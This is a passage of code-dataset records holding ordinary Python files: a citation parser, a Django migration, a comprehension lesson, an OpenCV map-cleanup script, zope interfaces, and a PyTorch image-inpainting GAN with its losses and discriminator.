not in title :\n            title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z, ]{0,}[\\.]',title)\n            title = title[0]\n        else:\n            title = title.split(').')[1]\n            title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z,: ]{0,}[\\.(]',title) \n            title = title[0]\n    else:\n        title = title[0][1:-1] \n    \n    # Create Citation\n    citationList.append(Citation(title, author, year))\n\n# list of citation dicts (renamed from 'dict', which shadowed the builtin)\nrecords = []\nfor citation in citationList:\n    if len(citation.year)>1:\n        records.append(\n            {\n                \"authors\": '; '.join(citation.author),\n                \"title\": citation.title,\n                \"year\": citation.year\n            }\n        )\n    elif len(citation.year)==0 and len(citation.author)==0:\n        records.append(\n            {\n                \"title\": citation.title\n            }\n        )\n    elif len(citation.year)==0:\n        records.append(\n            {\n                \"authors\": '; '.join(citation.author),\n                \"title\": citation.title\n            }\n        )\n\nwith open('a_judul.json', 'w') as f:\n    json.dump(records, f)","sub_path":"Tugas1/T1_4a_Kevin&Tito.py","file_name":"T1_4a_Kevin&Tito.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"117904135","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('myauth', '0006_auto_20151016_0405'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='myuser',\n            name='mobile_no',\n            field=models.CharField(default=9999999999, unique=True, max_length=10, validators=[django.core.validators.RegexValidator(regex=b'^\\\\d{10}$', message=b'Phone number must be exactly 10 digits')]),\n            preserve_default=False,\n        ),\n    ]\n","sub_path":"myauth/migrations/0007_myuser_mobile_no.py","file_name":"0007_myuser_mobile_no.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"565053008","text":"# This lesson is mainly about list comprehensions and dict comprehensions\n\"\"\"\nIn the previous program we first defined a dict and then looped over it, which is not very elegant.\nIn this lesson we learn list and dict comprehensions and use them to rewrite the program more elegantly.\nComprehensions still use a for loop, and they are supported for both lists and dicts.\n\"\"\"\n# List comprehensions first\n\n# collect the squares of all even numbers from 1 to 10 into a list\n# define a list\nalist = []\nfor i in range(1, 11):\n    if i % 2 == 0:\n        alist.append(i * i)\nprint(alist)\n\n# the elegant version: the line below is a list comprehension\nblist = [i * i for i in range(1, 11) if (i % 2) == 0]\nprint(blist)\n\nzodiac_name = (u\"水瓶座\", u\"双鱼座\", u\"白羊座\", u\"金牛座\", u\"双子座\",\n               u\"巨蟹座\", u\"狮子座\", u\"处女座\", u\"天秤座\", u\"天蝎座\", u\"射手座\", u\"摩羯座\")\n# dict comprehension\n# original version\nz_num = {}\nfor i in zodiac_name:\n    z_num[i] = 0\n\nz_num = {i: 0 for i in zodiac_name}\nprint(z_num)\n","sub_path":"Section2/lesson18.py","file_name":"lesson18.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"517711253","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2\nimport ICP\n\n\ndef start():\n    img = cv2.imread('/home/rauf/Desktop/MAPS/test_gmapping.pgm',-1)\n    img[img == 205] = 255\n    kernel = np.ones((7,7), np.uint8)\n    erosion = cv2.erode(img, kernel, iterations = 1)\n    blur = cv2.GaussianBlur(erosion,(5,5),0)\n    canny = cv2.Canny(blur, 50, 120)\n    small_img = cv2.resize(blur, (0,0), fx=0.2, fy=0.2)\n    cv2.imshow('image',blur)\n    cv2.imshow('small_image',small_img)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n    start()\n","sub_path":"plato_map_comparison/remove_unknown.py","file_name":"remove_unknown.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
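A minimal self-contained sketch of the unknown-cell cleanup from remove_unknown.py above, run on a synthetic occupancy grid so it does not depend on the hardcoded .pgm path (205 is the usual "unknown" value in map_server PGM exports):

    import cv2
    import numpy as np

    grid = np.full((64, 64), 205, dtype=np.uint8)  # all cells unknown
    grid[20:40, 20:40] = 0                         # a block of occupied cells
    grid[grid == 205] = 255                        # recode unknown as free, as above
    blur = cv2.GaussianBlur(cv2.erode(grid, np.ones((7, 7), np.uint8)), (5, 5), 0)
    edges = cv2.Canny(blur, 50, 120)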
+{"seq_id":"217087060","text":"\"\"\" Interfaces \"\"\"\nfrom zope.interface import Interface, Attribute\n\n\nclass ISurfSession(Interface):\n \"\"\"The surf.Session objects\"\"\"\n\n\nclass IObject2Surf(Interface):\n \"\"\" An object that writes surf info into a ISurfSession\n \"\"\"\n\n def write():\n \"\"\"Add the surf resource info into the session \"\"\"\n\n\nclass IGenericObject2Surf(IObject2Surf):\n \"\"\" An implementation of IObject2Surf\n\n This interface is only used to describe the GenericObject2Surf\n class; The IObject2Surf interface should be used as adapter interface\n \"\"\"\n\n resource = Attribute(u\"A surf resource that is written into the sesion\")\n namespace = Attribute(u\"The namespace that is attached to the resource\")\n subject = Attribute(u\"The subject (URI) of the resource\")\n prefix = Attribute(u\"The subject (URI) of the resource\")\n portalType = Attribute(u\"The portal type of the context, \"\n u\"will be used as resource class\")\n rdfId = Attribute(u\"The Id of the resource\")\n\n def modify_resource(resource, *args, **kwds):\n \"\"\"Override to modify the resource and return a new one\n \"\"\"\n\n\nclass ISurfResourceModifier(Interface):\n \"\"\"Plugins that can modify the saved resource for a given context\n \"\"\"\n\n def run(resource):\n \"\"\"Gets the rdf resource as argument, to allow it to be changed in place\n \"\"\"\n","sub_path":"eea/rdfmarshaller/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"477807369","text":"from torchvision import models\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F \nimport functools \nfrom torch.autograd import Variable \nimport numpy as np \n\n\n############################################################\n### Functions\n############################################################\ndef weights_init(m):\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and classname.find('Conv2d') != -1:\n nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in') \n m.weight.data *= 0.1\n if m.bias is not None:\n m.bias.data.zero_()\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n elif classname.find('ConvTranspose2d') != -1: \n m.weight.data.normal_(0.0, 0.02)\n if m.bias is not None:\n m.bias.data.zero_() \n elif classname.find('Linear') != -1:\n m.weight.data.normal_(0.0, 0.01)\n if m.bias is not None:\n m.bias.data.zero_() \n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type) \n return norm_layer \n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params) \n print('--------------------------------------------------------------') \n return num_params \n\ndef define_G(input_nc, output_nc, ngf, n_downsample_global=3, n_blocks_global=9, norm='instance', gpu_ids=[]): \n netG = ImageTinker2(input_nc, output_nc, ngf=64, n_downsampling=4, n_blocks=4, norm_layer=nn.BatchNorm2d, pad_type='replicate') \n \n num_params = print_network(netG) \n\n if len(gpu_ids) > 0:\n assert(torch.cuda.is_available())\n netG.cuda(gpu_ids[0]) \n 
netG.apply(weights_init) \n\n return netG, num_params \n\ndef define_D(input_nc, ndf, n_layers_D, norm='instance', use_sigmoid=False, num_D=1, getIntermFeat=False, gpu_ids=[]): \n norm_layer = get_norm_layer(norm_type=norm) \n netD = MultiscaleDiscriminator(input_nc, ndf, n_layers_D, norm_layer, use_sigmoid, num_D, getIntermFeat) \n num_params = print_network(netD) \n\n if len(gpu_ids) > 0:\n assert(torch.cuda.is_available())\n netD.cuda(gpu_ids[0]) \n netD.apply(weights_init) \n\n return netD, num_params \n\nclass ImageTinker2(nn.Module): \n def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=4, n_blocks=4, norm_layer=nn.InstanceNorm2d, pad_type='replicate', activation=nn.LeakyReLU(0.2, True)): \n assert(n_blocks >= 0)\n super(ImageTinker2, self).__init__() \n\n if pad_type == 'reflect':\n self.pad = nn.ReflectionPad2d \n elif pad_type == 'zero': \n self.pad = nn.ZeroPad2d \n elif pad_type == 'replicate':\n self.pad = nn.ReplicationPad2d \n\n # LR coarse tinker (encoder) \n lr_coarse_tinker = [self.pad(3), nn.Conv2d(input_nc, ngf // 2, kernel_size=7, stride=1, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf // 2, ngf, kernel_size=4, stride=2, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf, ngf * 2, kernel_size=4, stride=2, padding=0), activation] \n lr_coarse_tinker += [self.pad(1), nn.Conv2d(ngf * 2, ngf * 4, kernel_size=4, stride=2, padding=0), activation] \n # bottle neck\n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n lr_coarse_tinker += [MultiDilationResnetBlock(ngf * 4, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None)] \n # decoder \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [nn.UpsamplingBilinear2d(scale_factor=2), self.pad(1), nn.Conv2d(ngf, ngf // 2, kernel_size=3, stride=1, padding=0), activation] \n lr_coarse_tinker += [self.pad(3), nn.Conv2d(ngf // 2, output_nc, kernel_size=7, stride=1, padding=0)] \n ### get a coarse (256x256x3) \n self.lr_coarse_tinker = nn.Sequential(*lr_coarse_tinker) \n\n self.r_en_padd1 = self.pad(3) \n self.r_en_conv1 = nn.Conv2d(input_nc, ngf // 2, kernel_size=7, stride=1, padding=0) \n self.r_en_acti1 = activation \n\n self.r_en_padd2 = self.pad(1) \n self.r_en_conv2 = nn.Conv2d(ngf // 2, ngf, kernel_size=4, stride=2, padding=0) \n self.r_en_acti2 = activation \n\n self.r_en_padd3 = self.pad(1) \n self.r_en_conv3 = nn.Conv2d(ngf, ngf * 2, kernel_size=4, stride=2, padding=0) \n self.r_en_acti3 = activation \n\n self.r_en_skp_padd3 = self.pad(1) \n self.r_en_skp_conv3 = nn.Conv2d(ngf * 2, ngf * 2 // 2, kernel_size=3, stride=1, padding=0) \n self.r_en_skp_acti3 = activation \n\n self.r_en_padd4 = self.pad(1) 
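\n        # each stride-2 conv halves the spatial size, so a 256x256 input reaches 16x16 with ngf*8 channels at conv5; the r_en_skp_* branches tap the 1/4- and 1/8-scale features for the decoder's attention blocks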
\n self.r_en_conv4 = nn.Conv2d(ngf * 2, ngf * 4, kernel_size=4, stride=2, padding=0) \n self.r_en_acti4 = activation \n\n self.r_en_skp_padd4 = self.pad(1) \n self.r_en_skp_conv4 = nn.Conv2d(ngf * 4, ngf * 4 // 2, kernel_size=3, stride=1, padding=0) \n self.r_en_skp_acti4 = activation \n\n self.r_en_padd5 = self.pad(1) \n self.r_en_conv5 = nn.Conv2d(ngf * 4, ngf * 8, kernel_size=4, stride=2, padding=0) \n self.r_en_acti5 = activation \n\n self.r_md_mres1 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres2 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres5 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_satn1 = NonLocalBlock(ngf * 8, sub_sample=False, bn_layer=False) \n self.r_md_mres3 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres4 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n self.r_md_mres6 = MultiDilationResnetBlock_v3(ngf * 8, kernel_size=3, stride=1, padding=1, pad_type='replicate', norm=None) \n\n self.r_de_upbi1 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd1 = self.pad(1) \n self.r_de_conv1 = nn.Conv2d(ngf * 8, ngf * 4, kernel_size=3, stride=1, padding=0) \n self.r_de_acti1 = activation \n\n self.r_de_satn2 = NonLocalBlock(ngf * 4 // 2, sub_sample=False, bn_layer=False) \n self.r_de_satn3 = NonLocalBlock(ngf * 2 // 2, sub_sample=False, bn_layer=False) \n\n self.r_de_mix_padd1 = self.pad(1) \n self.r_de_mix_conv1 = nn.Conv2d(ngf * 4 + ngf * 4 // 2, ngf * 4, kernel_size=3, stride=1, padding=0) \n self.r_de_mix_acti1 = activation \n\n self.r_de_upbi2 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd2 = self.pad(1) \n self.r_de_conv2 = nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti2 = activation \n\n self.r_de_mix_padd2 = self.pad(1) \n self.r_de_mix_conv2 = nn.Conv2d(ngf * 2 + ngf * 2 // 2, ngf * 2, kernel_size=3, stride=1, padding=0) \n self.r_de_mix_acti2 = activation \n\n self.r_de_padd2_lr = self.pad(1) \n self.r_de_conv2_lr = nn.Conv2d(ngf * 2, ngf // 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti2_lr = activation \n\n self.r_de_padd3_lr = self.pad(1) \n self.r_de_conv3_lr = nn.Conv2d(ngf // 2, output_nc, kernel_size=3, stride=1, padding=0) \n\n self.r_de_upbi3 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd3 = self.pad(1) \n self.r_de_conv3 = nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=0) \n self.r_de_acti3 = activation \n\n self.r_de_upbi4 = nn.UpsamplingBilinear2d(scale_factor=2) \n self.r_de_padd4 = self.pad(1) \n self.r_de_conv4 = nn.Conv2d(ngf, ngf // 2, kernel_size=3, stride=1, padding=0) \n self.r_de_acti4 = activation \n\n self.r_de_padd5 = self.pad(3) \n self.r_de_conv5 = nn.Conv2d(ngf // 2, output_nc, kernel_size=7, stride=1, padding=0) \n\n self.r_de_padd5_lr_alpha = self.pad(1) \n self.r_de_conv5_lr_alpha = nn.Conv2d(ngf // 2, 1, kernel_size=3, stride=1, padding=0) \n self.r_de_acti5_lr_alpha = nn.Sigmoid() \n\n self.up = nn.UpsamplingBilinear2d(scale_factor=4)\n self.down = nn.UpsamplingBilinear2d(scale_factor=0.25) \n\n def forward(self, msked_img, msk, real_img=None): \n if real_img is not None: \n rimg = real_img \n inp = real_img * (1 - msk) + msk \n else:\n rimg = msked_img \n inp = msked_img \n \n x = 
torch.cat((inp, msk), dim=1) \n lr_x = self.lr_coarse_tinker(x) \n hr_x = lr_x * msk + rimg * (1 - msk) \n\n y = torch.cat((hr_x, msk), dim=1) \n e1 = self.r_en_acti1(self.r_en_conv1(self.r_en_padd1(y))) \n e2 = self.r_en_acti2(self.r_en_conv2(self.r_en_padd2(e1))) \n e3 = self.r_en_acti3(self.r_en_conv3(self.r_en_padd3(e2))) \n e4 = self.r_en_acti4(self.r_en_conv4(self.r_en_padd4(e3))) \n e5 = self.r_en_acti5(self.r_en_conv5(self.r_en_padd5(e4))) \n\n skp_e3 = self.r_en_skp_acti3(self.r_en_skp_conv3(self.r_en_skp_padd3(e3)))\n skp_e4 = self.r_en_skp_acti4(self.r_en_skp_conv4(self.r_en_skp_padd4(e4))) \n\n de3 = self.r_de_satn3(skp_e3) \n de4 = self.r_de_satn2(skp_e4) \n\n m1 = self.r_md_mres1(e5)\n m2 = self.r_md_mres2(m1) \n m5 = self.r_md_mres5(m2)\n a1 = self.r_md_satn1(m5)\n m3 = self.r_md_mres3(a1)\n m4 = self.r_md_mres4(m3) \n m6 = self.r_md_mres6(m4)\n\n d1 = self.r_de_acti1(self.r_de_conv1((self.r_de_padd1(self.r_de_upbi1(m6))))) # 32x32x256\n cat1 = torch.cat((d1, de4), dim=1) \n md1 = self.r_de_mix_acti1(self.r_de_mix_conv1(self.r_de_mix_padd1(cat1))) \n\n d2 = self.r_de_acti2(self.r_de_conv2((self.r_de_padd2(self.r_de_upbi2(md1))))) # 64x64x128\n cat2 = torch.cat((d2, de3), dim=1) \n md2 = self.r_de_mix_acti2(self.r_de_mix_conv2(self.r_de_mix_padd2(cat2))) \n\n d2_lr = self.r_de_acti2_lr(self.r_de_conv2_lr(self.r_de_padd2_lr(md2))) \n d3_lr = self.r_de_conv3_lr(self.r_de_padd3_lr(d2_lr))\n\n d3 = self.r_de_acti3(self.r_de_conv3((self.r_de_padd3(self.r_de_upbi3(md2))))) # 128x128x64\n d4 = self.r_de_acti4(self.r_de_conv4((self.r_de_padd4(self.r_de_upbi4(d3))))) # 256x256x32\n\n d5 = self.r_de_conv5(self.r_de_padd5(d4)) \n d5_lr_alpha = self.r_de_acti5_lr_alpha(self.r_de_conv5_lr_alpha(self.r_de_padd5_lr_alpha(d4))) \n\n ###\n # d5: 256x256x3 \n # d5_lr_alpha: 256x256x1\n # d3_lr: 64x64x3\n ###\n lr_img = d3_lr\n \n #reconst_img = d5\n d5 = d5 * msk + rimg * (1 - msk)\n lr_d5 = self.down(d5)\n lr_d5_res = d3_lr - lr_d5 \n hr_d5_res = self.up(lr_d5_res) \n reconst_img = d5 + hr_d5_res * d5_lr_alpha \n compltd_img = reconst_img * msk + rimg * (1 - msk) \n #out = compltd_img + hr_d5_res * d5_lr_alpha \n\n return compltd_img, reconst_img, lr_x, lr_img \n\n\n############################################################\n### Losses\n############################################################\nclass TVLoss(nn.Module):\n def forward(self, x):\n batch_size = x.size()[0]\n h_x = x.size()[2]\n w_x = x.size()[3]\n count_h = self._tensor_size(x[:, :, 1:, :])\n count_w = self._tensor_size(x[:, :, :, 1:])\n h_tv = torch.pow((x[:, :, 1:, :] - x[:, :, :h_x - 1, :]), 2).sum()\n w_tv = torch.pow((x[:, :, :, 1:] - x[:, :, :, :w_x - 1]), 2).sum()\n return 2 * (h_tv / count_h + w_tv / count_w) / batch_size\n\n def _tensor_size(self, t):\n return t.size()[1] * t.size()[2] * t.size()[3] \n\nclass VGGLoss(nn.Module):\n # vgg19 perceptual loss\n def __init__(self, gpu_ids):\n super(VGGLoss, self).__init__()\n self.vgg = Vgg19().cuda()\n self.criterion = nn.L1Loss()\n self.mse_loss = nn.MSELoss() \n\n self.weights = [1.0/32, 1.0/16, 1.0/8, 1.0/4, 1.0]\n mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).cuda() \n std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).cuda() \n self.register_buffer('mean', mean)\n self.register_buffer('std', std)\n\n def gram_matrix(self, x):\n (b, ch, h, w) = x.size() \n features = x.view(b, ch, w*h) \n features_t = features.transpose(1, 2) \n gram = features.bmm(features_t) / (ch * h * w) \n return gram \n\n def forward(self, x, y):\n x = (x - self.mean) / 
self.std \n y = (y - self.mean) / self.std \n x_vgg, y_vgg = self.vgg(x), self.vgg(y)\n\n loss = 0\n style_loss = 0\n for i in range(len(x_vgg)):\n loss += self.weights[i] * \\\n self.criterion(x_vgg[i], y_vgg[i].detach())\n gm_x = self.gram_matrix(x_vgg[i]) \n gm_y = self.gram_matrix(y_vgg[i]) \n style_loss += self.weights[i] * self.mse_loss(gm_x, gm_y.detach()) \n return loss, style_loss \n\nclass GANLoss_D_v2(nn.Module): \n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): \n super(GANLoss_D_v2, self).__init__() \n self.real_label = target_real_label \n self.fake_label = target_fake_label \n self.real_label_var = None \n self.fake_label_var = None \n self.Tensor = tensor \n if use_lsgan: \n self.loss = nn.MSELoss() \n else:\n def wgan_loss(input, target):\n return torch.mean(F.relu(1.-input)) if target else torch.mean(F.relu(1.+input)) \n self.loss = wgan_loss \n \n def get_target_tensor(self, input, target_is_real): \n target_tensor = None \n if target_is_real: \n create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label) \n self.real_label_var = Variable(real_tensor, requires_grad=False) \n target_tensor = self.real_label_var \n else:\n create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) \n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) \n self.fake_label_var = Variable(fake_tensor, requires_grad=False) \n target_tensor = self.fake_label_var \n return target_tensor \n \n def __call__(self, input, target_is_real): \n if isinstance(input[0], list): \n loss = 0\n for input_i in input:\n pred = input_i[-1] \n target_tensor = self.get_target_tensor(pred, target_is_real) \n #loss += self.loss(pred, target_tensor) \n loss += self.loss(pred, target_is_real) \n return loss \n else:\n target_tensor = self.get_target_tensor(input[-1], target_is_real) \n return self.loss(input[-1], target_tensor) \n\nclass GANLoss_G_v2(nn.Module): \n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): \n super(GANLoss_G_v2, self).__init__() \n self.real_label = target_real_label \n self.fake_label = target_fake_label \n self.real_label_var = None \n self.fake_label_var = None \n self.Tensor = tensor \n if use_lsgan: \n self.loss = nn.MSELoss() \n else:\n def wgan_loss(input, target):\n return -1 * input.mean() if target else input.mean() \n self.loss = wgan_loss \n \n def get_target_tensor(self, input, target_is_real): \n target_tensor = None \n if target_is_real: \n create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label) \n self.real_label_var = Variable(real_tensor, requires_grad=False) \n target_tensor = self.real_label_var \n else:\n create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) \n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) \n self.fake_label_var = Variable(fake_tensor, requires_grad=False) \n target_tensor = self.fake_label_var \n return target_tensor \n \n def __call__(self, input, target_is_real): \n if isinstance(input[0], list): \n loss = 0\n for input_i in input:\n pred = input_i[-1] \n target_tensor = self.get_target_tensor(pred, target_is_real) \n #loss += self.loss(pred, 
target_tensor) \n loss += self.loss(pred, target_is_real)\n return loss \n else:\n target_tensor = self.get_target_tensor(input[-1], target_is_real) \n return self.loss(input[-1], target_tensor) \n\n\n# Define the PatchGAN discriminator with the specified arguments. \nclass NLayerDiscriminator(nn.Module): \n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.InstanceNorm2d, use_sigmoid=False, getIntermFeat=False): \n super(NLayerDiscriminator, self).__init__() \n self.getIntermFeat = getIntermFeat \n self.n_layers = n_layers \n \n kw = 4\n padw = int(np.ceil((kw-1.0)/2)) \n sequence = [[SpectralNorm(nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw)), nn.LeakyReLU(0.2, True)]] \n \n nf = ndf \n for n in range(1, n_layers): \n nf_prev = nf \n nf = min(nf * 2, 512) \n sequence += [[\n SpectralNorm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw)), \n nn.LeakyReLU(0.2, True) \n ]] \n \n nf_prev = nf \n nf = min(nf * 2, 512) \n sequence += [[\n SpectralNorm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=1, padding=padw)), \n nn.LeakyReLU(0.2, True) \n ]] \n \n sequence += [[SpectralNorm(nn.Conv2d(nf, nf, kernel_size=kw, stride=1, padding=padw))]]\n \n # if use_sigmoid: \n # sequence += [[nn.Sigmoid()]] \n \n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n])) \n else: \n sequence_stream = [] \n for n in range(len(sequence)):\n sequence_stream += sequence[n] \n self.model = nn.Sequential(*sequence_stream)\n \n def forward(self, input): \n if self.getIntermFeat:\n res = [input] \n for n in range(self.n_layers + 2):\n model = getattr(self, 'model'+str(n)) \n res.append(model(res[-1])) \n return res[1:]\n else:\n return self.model(input) \n\n\n# Define the Multiscale Discriminator. 
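\n# It runs num_D copies of the PatchGAN discriminator above on an image pyramid built with nn.AvgPool2d; getIntermFeat additionally returns per-layer features (useful for feature-matching losses).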
\nclass MultiscaleDiscriminator(nn.Module): \n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, num_D=3, getIntermFeat=False): \n super(MultiscaleDiscriminator, self).__init__() \n self.num_D = num_D \n self.n_layers = n_layers \n self.getIntermFeat = getIntermFeat \n \n for i in range(num_D): \n netD = NLayerDiscriminator(input_nc, ndf, n_layers, norm_layer, use_sigmoid, getIntermFeat) \n if getIntermFeat: \n for j in range(n_layers+2): \n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j))) \n else:\n setattr(self, 'layer'+str(i), netD.model) \n \n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False) \n \n def singleD_forward(self, model, input):\n if self.getIntermFeat:\n result = [input] \n for i in range(len(model)):\n result.append(model[i](result[-1])) \n return result[1:]\n else:\n return [model(input)] \n \n def forward(self, input): \n num_D = self.num_D \n result = [] \n input_downsampled = input \n for i in range(num_D):\n if self.getIntermFeat: \n model = [getattr(self, 'scale'+str(num_D-1-i)+'_layer'+str(j)) for j in range(self.n_layers+2)] \n else: \n model = getattr(self, 'layer'+str(num_D-1-i)) \n result.append(self.singleD_forward(model, input_downsampled)) \n if i != (num_D-1):\n input_downsampled = self.downsample(input_downsampled) \n return result \n \n \n### Define Vgg19 for vgg_loss \nclass Vgg19(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg19, self).__init__()\n vgg_pretrained_features = models.vgg19(pretrained=True).features\n self.slice1 = nn.Sequential()\n self.slice2 = nn.Sequential()\n self.slice3 = nn.Sequential()\n self.slice4 = nn.Sequential()\n self.slice5 = nn.Sequential()\n\n for x in range(1):\n self.slice1.add_module(str(x), vgg_pretrained_features[x])\n for x in range(1, 6):\n self.slice2.add_module(str(x), vgg_pretrained_features[x])\n for x in range(6, 11):\n self.slice3.add_module(str(x), vgg_pretrained_features[x])\n for x in range(11, 20):\n self.slice4.add_module(str(x), vgg_pretrained_features[x])\n for x in range(20, 29):\n self.slice5.add_module(str(x), vgg_pretrained_features[x])\n\n # fixed pretrained vgg19 model for feature extraction\n if not requires_grad:\n for param in self.parameters():\n param.requires_grad = False\n\n def forward(self, x):\n h_relu1 = self.slice1(x)\n h_relu2 = self.slice2(h_relu1)\n h_relu3 = self.slice3(h_relu2)\n h_relu4 = self.slice4(h_relu3)\n h_relu5 = self.slice5(h_relu4)\n out = [h_relu1, h_relu2, h_relu3, h_relu4, h_relu5]\n return out \n\n### Multi-Dilation ResnetBlock\nclass MultiDilationResnetBlock(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(MultiDilationResnetBlock, self).__init__() \n\n self.branch1 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=2, dilation=2, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch2 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=3, dilation=3, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch3 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=4, dilation=4, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch4 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=5, dilation=5, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n 
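# four more parallel branches with wider dilation rates (6, 8, 10) plus a plain\n        # dilation-1 branch; forward() concatenates all eight outputs and fuses them with fusion9\n        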
